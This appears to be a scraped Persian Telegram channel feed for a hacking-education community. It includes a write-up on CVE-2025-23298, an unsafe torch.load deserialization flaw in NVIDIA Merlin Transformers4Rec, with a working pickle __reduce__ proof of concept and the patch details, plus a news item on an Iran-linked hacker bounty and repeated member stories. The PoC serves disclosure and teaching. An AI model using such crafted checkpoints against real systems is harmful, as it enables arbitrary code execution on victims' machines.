💻باگ بانتی: گروه هکری مرتبط با ایران برای اطلاعات نظامی اسرائیل ۳۰٬۰۰۰ دلار بانتی تعیین کرده است.
https://www.iranintl.com/en/202512164597
@TryHackBoxStory
https://www.iranintl.com/en/202512164597
@TryHackBoxStory
Iranintl
Iran-linked hacker group offers $30,000 bounty for Israel's military info
An Iran-linked hacker group said it was offering a $30,000 reward for information related to Israel’s military sector after releasing material it said identified people involved in designing Israeli missile defense systems.
🔖 CVE-2025-23298: RCE در NVIDIA Merlin
📌 بهتازگی یک آسیبپذیری بحرانی در کتابخانه NVIDIA Merlin Transformers4Rec شناسایی شده است که امکان اجرای کد از راه دور (Remote Code Execution – RCE) با سطح دسترسی root را فراهم میکند.
این آسیبپذیری با شناسه CVE-2025-23298 رهگیری میشود و به deserialization ناامن دادهها هنگام بارگذاری مدلها مربوط است.
❓خب NVIDIA Merlin چیست؟
ا ✍️ NVIDIA Merlin یک اکوسیستم Open Source برای ساخت High-Performance Recommendation Systems است.
ماژول Transformers4Rec که بخشی از این اکوسیستم محسوب میشود، برای استفاده از Transformer architectures مدرن در سیستمهای توصیهگر مبتنی بر Sequential Data و Session-based Recommendations طراحی شده است.
💢 ماهیت آسیبپذیری
ریشه آسیبپذیری در تابع زیر قرار دارد:
این تابع مسئول بازیابی (restore) وضعیت مدل است، اما بهصورت مستقیم از تابع torch.load() در PyTorch استفاده میکند، بدون اعمال هیچگونه security parameter.
تابع torch.load() بهطور داخلی از ماژول pickle در Python استفاده میکند؛ ماژولی که بهطور ذاتی برای پردازش دادههای غیرقابل اعتماد unsafe محسوب میشود.
ماژول pickle قادر است هر نوع Python object را serialize و deserialize کند؛ از جمله اشیایی که در زمان deserialization میتوانند کد دلخواه اجرا کنند.
این رفتار یک bug نیست، بلکه یک feature است، اما زمانی که فایلهای pickle غیرقابل اعتماد بارگذاری شوند، به یک آسیبپذیری امنیتی جدی تبدیل میشود.
💠 پیادهسازی فنی حمله
برای اثبات آسیبپذیری، یک malicious checkpoint file ساخته شده که در زمان load شدن، دستورات دلخواه سیستمعامل را اجرا میکند.
این exploit از متد reduce در pickle استفاده میکند تا اجرای دستور را در فرآیند deserialization تحمیل کند.
زمانی که قربانی این فایل checkpoint را با تابع آسیبپذیر بارگذاری میکند:
تابع os.system بلافاصله اجرا میشود
این اجرا قبل از بارگذاری وزنهای مدل اتفاق میافتد
دلیل این رفتار آن است که pickle اشیاء را بهصورت ترتیبی deserialize میکند و object مخرب در زمان deserialize شدن model_state_dict فعال میشود.
⭕️ PoC
کد زیر یک فایل checkpoint مخرب ایجاد میکند:
در صورت بارگذاری این فایل توسط تابع آسیبپذیر:
فایل /tmp/pwned_by_zdi ایجاد میشود
که نشاندهنده اجرای موفق کد دلخواه است
در مقاله اصلی، یک PoC از ZDI (Zero Day Initiative) ارائه شده است، اما به دلیل در دسترس نبودن اسکریپت در زمان نگارش، از آن استفاده نشده و exploit حاضر با تغییرات جزئی بازنویسی شده است
💢 رفع آسیبپذیری
ا ✍️ NVIDIA این آسیبپذیری را در commit b7eaea5 (PR #802) برطرف کرده است:
Security Bulletin رسمی:
https://nvidia.custhelp.com/app/answers/detail/a_id/5683/~/security-bulletin%3A-nvidia-merlin-transformers4rec---august-2025
🔴 تغییرات اصلی Patch:
🔶 تغییر مکانیزم بارگذاری checkpoint
🔶 اضافه شدن validation اضافی روی Python serialized objects
🔶 حذف استفاده مستقیم از torch.load()
🔶 کتابخانه Transformers4Rec اکنون از ماژول serialization.py استفاده میکند که:
🔶 ا deserialization را فقط به Approved Classes محدود میکند
🔶 یک Safe Loading Function با Type Checking پیادهسازی شده است
#آسیبپذیری
@TryHackBoxStory
📌 بهتازگی یک آسیبپذیری بحرانی در کتابخانه NVIDIA Merlin Transformers4Rec شناسایی شده است که امکان اجرای کد از راه دور (Remote Code Execution – RCE) با سطح دسترسی root را فراهم میکند.
این آسیبپذیری با شناسه CVE-2025-23298 رهگیری میشود و به deserialization ناامن دادهها هنگام بارگذاری مدلها مربوط است.
❓خب NVIDIA Merlin چیست؟
ا ✍️ NVIDIA Merlin یک اکوسیستم Open Source برای ساخت High-Performance Recommendation Systems است.
ماژول Transformers4Rec که بخشی از این اکوسیستم محسوب میشود، برای استفاده از Transformer architectures مدرن در سیستمهای توصیهگر مبتنی بر Sequential Data و Session-based Recommendations طراحی شده است.
💢 ماهیت آسیبپذیری
ریشه آسیبپذیری در تابع زیر قرار دارد:
load_model_trainer_states_from_checkpoint
این تابع مسئول بازیابی (restore) وضعیت مدل است، اما بهصورت مستقیم از تابع torch.load() در PyTorch استفاده میکند، بدون اعمال هیچگونه security parameter.
تابع torch.load() بهطور داخلی از ماژول pickle در Python استفاده میکند؛ ماژولی که بهطور ذاتی برای پردازش دادههای غیرقابل اعتماد unsafe محسوب میشود.
ماژول pickle قادر است هر نوع Python object را serialize و deserialize کند؛ از جمله اشیایی که در زمان deserialization میتوانند کد دلخواه اجرا کنند.
این رفتار یک bug نیست، بلکه یک feature است، اما زمانی که فایلهای pickle غیرقابل اعتماد بارگذاری شوند، به یک آسیبپذیری امنیتی جدی تبدیل میشود.
💠 پیادهسازی فنی حمله
برای اثبات آسیبپذیری، یک malicious checkpoint file ساخته شده که در زمان load شدن، دستورات دلخواه سیستمعامل را اجرا میکند.
این exploit از متد reduce در pickle استفاده میکند تا اجرای دستور را در فرآیند deserialization تحمیل کند.
زمانی که قربانی این فایل checkpoint را با تابع آسیبپذیر بارگذاری میکند:
تابع os.system بلافاصله اجرا میشود
این اجرا قبل از بارگذاری وزنهای مدل اتفاق میافتد
دلیل این رفتار آن است که pickle اشیاء را بهصورت ترتیبی deserialize میکند و object مخرب در زمان deserialize شدن model_state_dict فعال میشود.
⭕️ PoC
کد زیر یک فایل checkpoint مخرب ایجاد میکند:
import os
import pickle
import torch
class MaliciousObject:
def __reduce__(self):
return (os.system, (
'touch /tmp/pwned_by_zdi',))
# ایجاد شیء مخرب
malicious_object = MaliciousObject()
# ساخت model_state_dict شامل object مخرب
model_state_dict = {
'malicious': malicious_object
}
# ذخیره checkpoint مخرب
torch.save(model_state_dict, 'malicious_checkpoint.pt')
print("فایل مخرب 'malicious_checkpoint.pt' ایجاد شد.")
در صورت بارگذاری این فایل توسط تابع آسیبپذیر:
فایل /tmp/pwned_by_zdi ایجاد میشود
که نشاندهنده اجرای موفق کد دلخواه است
در مقاله اصلی، یک PoC از ZDI (Zero Day Initiative) ارائه شده است، اما به دلیل در دسترس نبودن اسکریپت در زمان نگارش، از آن استفاده نشده و exploit حاضر با تغییرات جزئی بازنویسی شده است
💢 رفع آسیبپذیری
ا ✍️ NVIDIA این آسیبپذیری را در commit b7eaea5 (PR #802) برطرف کرده است:
Security Bulletin رسمی:
https://nvidia.custhelp.com/app/answers/detail/a_id/5683/~/security-bulletin%3A-nvidia-merlin-transformers4rec---august-2025
🔴 تغییرات اصلی Patch:
🔶 تغییر مکانیزم بارگذاری checkpoint
🔶 اضافه شدن validation اضافی روی Python serialized objects
🔶 حذف استفاده مستقیم از torch.load()
🔶 کتابخانه Transformers4Rec اکنون از ماژول serialization.py استفاده میکند که:
🔶 ا deserialization را فقط به Approved Classes محدود میکند
🔶 یک Safe Loading Function با Type Checking پیادهسازی شده است
#آسیبپذیری
@TryHackBoxStory
❤4
درود من خیلی اتفاقی از تلگرام با شما آشنا شدم ، از همون کودکی با جادی آشنا شدم و از اون وبلاگ ساده جادی که کتاب خالق لینوکس رو ترجمه کرده بود و در وبلاگ به اشتراک گذاشته بود ، عاشق دنیای لینوکس و پروژه های متن باز شدم ، تمام این علاقه رو از همون اول با جادی شروع شد که یک کتاب بسیار ساده خالق لینوکس رو به اشتراک گذاشته بود و من کتاب رو بارها خوندم و عاشق دنیای آمریکا شدم و تفکرات آنها.
تمام توزیع های لینوکس رو امتحان میکردم و تسلط کافی روی همه شون پیدا کردم به جز یکی شون اونم توزیع کالی لینوکس بود ، اون زمان ک بقیه نمیدونسن پاکمن چیه من عاشق توزیع مانجارو شدم و تماماً پول توجیبی های خودم رو برای این سرور ها خرج میکردم در زمان که سن سال آنچنان نداشتم یک اسکریپت کد نوشته بودم که ISP رو مستقیم میبرد به سیاست های پورن و من پشت اون اسکریپت کد میزدم.
پام رسید ارمنستان بهترین شکل ممکن این تخصص بهم درآمد خوبی داد، بعد با همون درآمد پام رسید استانبول ترکیه و عشق کردم باز تخصص ام بکار اومد برام.
علاقه ای ک ایجاد شده بود برام از طرف جادی بود.
شاید اینا بدرد یکی بخوره و براش نقشه راه یادگیری مستمر بشه 🌹
@THBS
تمام توزیع های لینوکس رو امتحان میکردم و تسلط کافی روی همه شون پیدا کردم به جز یکی شون اونم توزیع کالی لینوکس بود ، اون زمان ک بقیه نمیدونسن پاکمن چیه من عاشق توزیع مانجارو شدم و تماماً پول توجیبی های خودم رو برای این سرور ها خرج میکردم در زمان که سن سال آنچنان نداشتم یک اسکریپت کد نوشته بودم که ISP رو مستقیم میبرد به سیاست های پورن و من پشت اون اسکریپت کد میزدم.
پام رسید ارمنستان بهترین شکل ممکن این تخصص بهم درآمد خوبی داد، بعد با همون درآمد پام رسید استانبول ترکیه و عشق کردم باز تخصص ام بکار اومد برام.
علاقه ای ک ایجاد شده بود برام از طرف جادی بود.
شاید اینا بدرد یکی بخوره و براش نقشه راه یادگیری مستمر بشه 🌹
@THBS
❤2
TryHackBox Story
Photo
#تجربه_شما اگر مایل بودید داستان اشناییتون با این حوزه یا اشنایی با ما رو به اشتراک بگذارید میتونید اینجا کامنت کنید . یا در بات بنویسید : @Unique_exploitbot
Telegram
Try Hack Box
✍ داستان خودتونو تعریف کنید ! 🕊 چگونه بخشی از جامعه TryHackBox شدید یا در آن چه چیزی پیدا کردید؟🥀 شاید محتوای کانال توانسته براتون تغییری ایجاد کنه یا در چیزی کمکتون کرده باشه؟🖤
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور…
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور…
شاید جالب و یکم عجیب باشه داستان من
اما مسیر من و باز شدن پا من تو این جهان با یک اتهام شروع شد.
من رشته ام الکترونیک بود و تو این زمینه دوسال هم به جز کارآموزیم کار کردم با جون و دل و چقدرم عاشق این رشته بودم و یادم نمیره چه صبح هایی که هیچ کس نبود و سگ ها با جفت هاشون پرسه میخوردن من میرفتم یعنی یادم نمیره اون صبحی که داشتم میرفتم سگ نره چطور چپ چپ نگام میکرد و میدونستم قطعا توم یک چیزی ترسناک میدید😁
نمیدونست من مثل خودش ترسیدم ولی تا زمانیکه رد بشم به چشاش خیره بودم و اونم😂
به هرحال خروس خون میرفتم و شغال خون خونه بودم ولی بعد از دوسال که رسیدم به اوج کاری خودم و همیشه دوست داشتم تو اوج از کارم خدافظی کنم همینم شد و من دیگه نتونستم ادامه بدم و همه رو با شک مواجه کردم.
بعد از یکسال و اندی از سر ناآگاهی وارد خرید و فروش ارزدیجیتال شدم.
چه پول خوبی هم داشت😂و وسوسه شدم بعد از چهارتا تراکنش یک حس عجیب و غریبی اومد سمتم نکنه ...
بعلع نکنه عملی شد و بعد از قطع همکاری من بعداز چهارتراکنش فتاجان حساب های بنده رو بلوکه کرد و کم کم از اقصا نقاط کشور از من شکایت شد و من شده بودم واسط یک پولشویی مالی،کلاهبردار،هکر
پلیس ها بودن که زنگ میزدن و مثل چی ترسیده بودم 😅 و منی که پام به دادگاه باز نشده بود باز شد.
ولی بالاخره خودم رو جمع و جور کردم و رفتم شکایت کردن از اون فرد که اونم قلابی بود که قطعا هم باید همین می بود.
هیچی دیگه قاضی تهران تیر خلاصی رو زد و منو کرد هکر و از اونجا رسما داستان من شروع شد هرچند از همون ابتدا مسیر افتادم توش که اصلا چیه اینا و... و کم کم خوشمان آمد.
درس هایی که من گرفتم اینا بود:
"هیچ موقع از روی کنجکاوی وارد یک مسیری نشید،نمیگم بده،میخوام بگم قبل از هر اقدامی باید تمام جوانبش رو سنجید و بعد پا توی اون مسیر گذاشت،مگه چقدر فرصت داریم؟
پس تا جایی که ممکنه باید آگاهانه و سنجیده قدم از قدم برداشت.
هیچ اتفاقی هم اتفاقی اتفاق نمی افته و اینم که من افتادم تو این مسیر قطعا اتفاقی نبوده و هیچ چیز دوستان اتفاقی نیست و پشت همه اینها یک درس بزرگی نهفته که میخواد یا ما رو بیدار کنه یا نگاه مون و روش و سبک زندگی مون رو تغییر بده.
حالا یا تغییر میکنی یا تغییرت میده ببین با کدومش راحتتری.
تغییر هیچ وقت آسون نبوده و همیشه توام با درده....
باید منعطف بشی، باید بتونی خودت رو با هر شرایطی،تکرار میکنم با هر شرایطی سازگار کنی،اونوقته که تبدیل میشی به یک انسان ابرقهرمان و مثل کوه قوی و مستحکم میشی "
کم کم از tryhackme , hackthebox رسیدم به این گروه و کانال باحال مخصوصا با رادیوهاتون که تجربه اساتید میگید واقعا کاربردیه برای منی که تازه کارم و فکر میکنم این مسیر هیچ موقع کهنگی نداره و همینه که من شیفته اش شدم.
ذهنیتم رو قوی گسترش دادم و همیشه مستقل بودم.
سعی کردم همیشه مستقل و روی پای خودم بایستم ولی از یکجایی به بعد نشوند سرجام جهان که بشین ببین داری چیکار میکنی با زندگی خودت،که کم کم فهمیدم بله مکانیزم این جهان چطور کار میکنه...
امیدوارم هرکجا که هستید موفق و شاد زیست کنید و کیف دنیا رو ببرید که تا فرصت هست باید عشق و حال کرد با کاری که دوستش دارید.
قطعا هرکسی داستان خودش رو داره و جذابم هست.
ممنون از دوست خوبمون که این پیشنهاد عالی رو دادن و واقعا لذت بخشه خوندن تجربیات آدما چون سراسر درس و آگاهی هست.
اما مسیر من و باز شدن پا من تو این جهان با یک اتهام شروع شد.
من رشته ام الکترونیک بود و تو این زمینه دوسال هم به جز کارآموزیم کار کردم با جون و دل و چقدرم عاشق این رشته بودم و یادم نمیره چه صبح هایی که هیچ کس نبود و سگ ها با جفت هاشون پرسه میخوردن من میرفتم یعنی یادم نمیره اون صبحی که داشتم میرفتم سگ نره چطور چپ چپ نگام میکرد و میدونستم قطعا توم یک چیزی ترسناک میدید😁
نمیدونست من مثل خودش ترسیدم ولی تا زمانیکه رد بشم به چشاش خیره بودم و اونم😂
به هرحال خروس خون میرفتم و شغال خون خونه بودم ولی بعد از دوسال که رسیدم به اوج کاری خودم و همیشه دوست داشتم تو اوج از کارم خدافظی کنم همینم شد و من دیگه نتونستم ادامه بدم و همه رو با شک مواجه کردم.
بعد از یکسال و اندی از سر ناآگاهی وارد خرید و فروش ارزدیجیتال شدم.
چه پول خوبی هم داشت😂و وسوسه شدم بعد از چهارتا تراکنش یک حس عجیب و غریبی اومد سمتم نکنه ...
بعلع نکنه عملی شد و بعد از قطع همکاری من بعداز چهارتراکنش فتاجان حساب های بنده رو بلوکه کرد و کم کم از اقصا نقاط کشور از من شکایت شد و من شده بودم واسط یک پولشویی مالی،کلاهبردار،هکر
پلیس ها بودن که زنگ میزدن و مثل چی ترسیده بودم 😅 و منی که پام به دادگاه باز نشده بود باز شد.
ولی بالاخره خودم رو جمع و جور کردم و رفتم شکایت کردن از اون فرد که اونم قلابی بود که قطعا هم باید همین می بود.
هیچی دیگه قاضی تهران تیر خلاصی رو زد و منو کرد هکر و از اونجا رسما داستان من شروع شد هرچند از همون ابتدا مسیر افتادم توش که اصلا چیه اینا و... و کم کم خوشمان آمد.
درس هایی که من گرفتم اینا بود:
"هیچ موقع از روی کنجکاوی وارد یک مسیری نشید،نمیگم بده،میخوام بگم قبل از هر اقدامی باید تمام جوانبش رو سنجید و بعد پا توی اون مسیر گذاشت،مگه چقدر فرصت داریم؟
پس تا جایی که ممکنه باید آگاهانه و سنجیده قدم از قدم برداشت.
هیچ اتفاقی هم اتفاقی اتفاق نمی افته و اینم که من افتادم تو این مسیر قطعا اتفاقی نبوده و هیچ چیز دوستان اتفاقی نیست و پشت همه اینها یک درس بزرگی نهفته که میخواد یا ما رو بیدار کنه یا نگاه مون و روش و سبک زندگی مون رو تغییر بده.
حالا یا تغییر میکنی یا تغییرت میده ببین با کدومش راحتتری.
تغییر هیچ وقت آسون نبوده و همیشه توام با درده....
باید منعطف بشی، باید بتونی خودت رو با هر شرایطی،تکرار میکنم با هر شرایطی سازگار کنی،اونوقته که تبدیل میشی به یک انسان ابرقهرمان و مثل کوه قوی و مستحکم میشی "
کم کم از tryhackme , hackthebox رسیدم به این گروه و کانال باحال مخصوصا با رادیوهاتون که تجربه اساتید میگید واقعا کاربردیه برای منی که تازه کارم و فکر میکنم این مسیر هیچ موقع کهنگی نداره و همینه که من شیفته اش شدم.
ذهنیتم رو قوی گسترش دادم و همیشه مستقل بودم.
سعی کردم همیشه مستقل و روی پای خودم بایستم ولی از یکجایی به بعد نشوند سرجام جهان که بشین ببین داری چیکار میکنی با زندگی خودت،که کم کم فهمیدم بله مکانیزم این جهان چطور کار میکنه...
امیدوارم هرکجا که هستید موفق و شاد زیست کنید و کیف دنیا رو ببرید که تا فرصت هست باید عشق و حال کرد با کاری که دوستش دارید.
قطعا هرکسی داستان خودش رو داره و جذابم هست.
ممنون از دوست خوبمون که این پیشنهاد عالی رو دادن و واقعا لذت بخشه خوندن تجربیات آدما چون سراسر درس و آگاهی هست.
❤3
TryHackBox Story
شاید جالب و یکم عجیب باشه داستان من اما مسیر من و باز شدن پا من تو این جهان با یک اتهام شروع شد. من رشته ام الکترونیک بود و تو این زمینه دوسال هم به جز کارآموزیم کار کردم با جون و دل و چقدرم عاشق این رشته بودم و یادم نمیره چه صبح هایی که هیچ کس نبود و سگ…
#تجربه_شما اگر مایل بودید داستان اشناییتون با این حوزه یا اشنایی با ما رو به اشتراک بگذارید میتونید اینجا کامنت کنید . یا در بات بنویسید : @Unique_exploitbot
Telegram
Try Hack Box
✍ داستان خودتونو تعریف کنید ! 🕊 چگونه بخشی از جامعه TryHackBox شدید یا در آن چه چیزی پیدا کردید؟🥀 شاید محتوای کانال توانسته براتون تغییری ایجاد کنه یا در چیزی کمکتون کرده باشه؟🖤
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور…
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور…